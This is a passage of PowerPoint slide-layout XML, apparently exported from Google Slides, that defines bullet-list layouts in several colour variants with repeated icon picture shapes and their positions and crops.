          <a:xfrm>
            <a:off x="2544050" y="1545675"/>
            <a:ext cx="5770200" cy="2430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36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9" name="Google Shape;79;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="139" r="149"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258175" y="1332825"/>
            <a:ext cx="1371601" cy="2002535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Google Shape;80;p1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81" name="Google Shape;81;p10"/>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40. Bullets 1–7 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1793"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1794" name="Google Shape;1794;p92"/>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9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96" name="Google Shape;1796;p9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797" name="Google Shape;1797;p9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798" name="Google Shape;1798;p9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799" name="Google Shape;1799;p9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800" name="Google Shape;1800;p9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01" name="Google Shape;1801;p92"/>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02" name="Google Shape;1802;p92"/>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92"/>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04" name="Google Shape;1804;p92"/>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92"/>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06" name="Google Shape;1806;p92"/>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92"/>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08" name="Google Shape;1808;p92"/>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92"/>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10" name="Google Shape;1810;p92"/>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92"/>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12" name="Google Shape;1812;p92"/>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92"/>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814" name="Google Shape;1814;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1815" name="Google Shape;1815;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1816" name="Google Shape;1816;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1817" name="Google Shape;1817;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1818" name="Google Shape;1818;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1819" name="Google Shape;1819;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520979" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1820" name="Google Shape;1820;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520979"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41. Bullets 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1821"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1822" name="Google Shape;1822;p93"/>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9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24" name="Google Shape;1824;p9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825" name="Google Shape;1825;p9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826" name="Google Shape;1826;p9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827" name="Google Shape;1827;p9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828" name="Google Shape;1828;p9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29" name="Google Shape;1829;p93"/>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30" name="Google Shape;1830;p93"/>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93"/>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32" name="Google Shape;1832;p93"/>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93"/>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34" name="Google Shape;1834;p93"/>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93"/>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36" name="Google Shape;1836;p93"/>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93"/>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38" name="Google Shape;1838;p93"/>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93"/>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40" name="Google Shape;1840;p93"/>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93"/>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842" name="Google Shape;1842;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1843" name="Google Shape;1843;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1844" name="Google Shape;1844;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1845" name="Google Shape;1845;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1846" name="Google Shape;1846;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2552" b="2561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1847" name="Google Shape;1847;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2892"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1848" name="Google Shape;1848;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2892"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520980"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42. Bullets 1–7 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1849"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1850" name="Google Shape;1850;p94"/>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9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52" name="Google Shape;1852;p9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853" name="Google Shape;1853;p9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854" name="Google Shape;1854;p9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855" name="Google Shape;1855;p9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856" name="Google Shape;1856;p9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57" name="Google Shape;1857;p94"/>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58" name="Google Shape;1858;p94"/>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94"/>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60" name="Google Shape;1860;p94"/>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94"/>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62" name="Google Shape;1862;p94"/>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94"/>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64" name="Google Shape;1864;p94"/>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94"/>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66" name="Google Shape;1866;p94"/>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94"/>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68" name="Google Shape;1868;p94"/>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94"/>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870" name="Google Shape;1870;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1871" name="Google Shape;1871;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1872" name="Google Shape;1872;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1873" name="Google Shape;1873;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1874" name="Google Shape;1874;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1875" name="Google Shape;1875;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1876" name="Google Shape;1876;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520980"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43. Bullets 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1877"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1878" name="Google Shape;1878;p9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79" name="Google Shape;1879;p9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880" name="Google Shape;1880;p9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881" name="Google Shape;1881;p9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882" name="Google Shape;1882;p9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883" name="Google Shape;1883;p9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84" name="Google Shape;1884;p95"/>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95"/>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86" name="Google Shape;1886;p95"/>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95"/>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88" name="Google Shape;1888;p95"/>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95"/>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90" name="Google Shape;1890;p95"/>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95"/>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92" name="Google Shape;1892;p95"/>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95"/>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94" name="Google Shape;1894;p95"/>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95"/>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96" name="Google Shape;1896;p95"/>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95"/>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98" name="Google Shape;1898;p95"/>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95"/>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900" name="Google Shape;1900;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1901" name="Google Shape;1901;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1902" name="Google Shape;1902;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1903" name="Google Shape;1903;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1904" name="Google Shape;1904;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1905" name="Google Shape;1905;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1906" name="Google Shape;1906;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1907" name="Google Shape;1907;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>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44. Bullets 1–8 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1908"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1909" name="Google Shape;1909;p9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10" name="Google Shape;1910;p9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911" name="Google Shape;1911;p9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912" name="Google Shape;1912;p9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913" name="Google Shape;1913;p9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914" name="Google Shape;1914;p9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15" name="Google Shape;1915;p96"/>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96"/>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17" name="Google Shape;1917;p96"/>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96"/>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19" name="Google Shape;1919;p96"/>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96"/>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21" name="Google Shape;1921;p96"/>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96"/>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23" name="Google Shape;1923;p96"/>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96"/>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25" name="Google Shape;1925;p96"/>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96"/>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27" name="Google Shape;1927;p96"/>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96"/>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29" name="Google Shape;1929;p96"/>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96"/>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931" name="Google Shape;1931;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1932" name="Google Shape;1932;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1933" name="Google Shape;1933;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1934" name="Google Shape;1934;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1935" name="Google Shape;1935;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1936" name="Google Shape;1936;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144"/>
            <a:ext cx="475488" cy="361371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
